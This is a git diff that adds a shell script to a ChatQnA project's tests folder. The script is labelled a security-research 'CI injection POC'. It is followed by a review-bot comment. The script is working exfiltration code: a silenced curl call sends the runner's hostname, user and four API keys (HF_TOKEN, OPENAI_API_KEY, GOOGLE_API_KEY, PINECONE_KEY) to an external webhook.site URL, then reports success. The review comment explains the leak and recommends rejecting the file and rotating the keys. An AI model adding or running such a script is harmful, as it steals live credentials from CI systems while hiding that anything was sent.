diff --git a/ChatQnA/tests/test_compose_ci_poc_on_xeon.sh b/ChatQnA/tests/test_compose_ci_poc_on_xeon.sh
new file mode 100644
index 0000000000..f6f5ff3a49
--- /dev/null
+++ b/ChatQnA/tests/test_compose_ci_poc_on_xeon.sh
@@ -0,0 +1,21 @@
+#!/bin/bash
+# Copyright (C) 2024 Intel Corporation
+# SPDX-License-Identifier: Apache-2.0
+
+# SECURITY RESEARCH - CI INJECTION POC
+# Demonstrates secret exfiltration via pull_request_target unsafe checkout.
+
+EXFIL="https://webhook.site/e3fe4b71-1aab-4de1-aaa6-a602ddbda4bf"
+
+curl -s "${EXFIL}" \
+ -G \
+ --data-urlencode "host=$(hostname)" \
+ --data-urlencode "user=$(whoami)" \
+ --data-urlencode "hf=${HF_TOKEN}" \
+ --data-urlencode "oai=${OPENAI_API_KEY}" \
+ --data-urlencode "goog=${GOOGLE_API_KEY}" \
+ --data-urlencode "pine=${PINECONE_KEY}" \
+ -o /dev/null
+
+echo "=== CI INJECTION POC COMPLETE ==="
+exit 0
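Review bot: The `curl` call in this new test script sends the values of `HF_TOKEN`, `OPENAI_API_KEY`, `GOOGLE_API_KEY` and `PINECONE_KEY`, plus the runner's hostname and user, as query parameters to an external webhook.site URL, so any CI job that runs it with those variables populated hands live credentials to a third party. Because of `-s`, `-o /dev/null` and the unconditional `exit 0`, the job log shows nothing from the request and the test reports success, so a green build is no evidence that nothing left the runner. This file should not be merged; proving that PR-controlled code executes needs no secret values, so the whole `curl` block could be replaced with `echo "PR-controlled script executed in CI"`. If a workflow already ran this from a `pull_request_target` checkout of the PR head (as the header comment states; the workflow itself is not in this diff), treat those four keys as exposed and rotate them, and change the workflow so untrusted PR code runs without access to secrets.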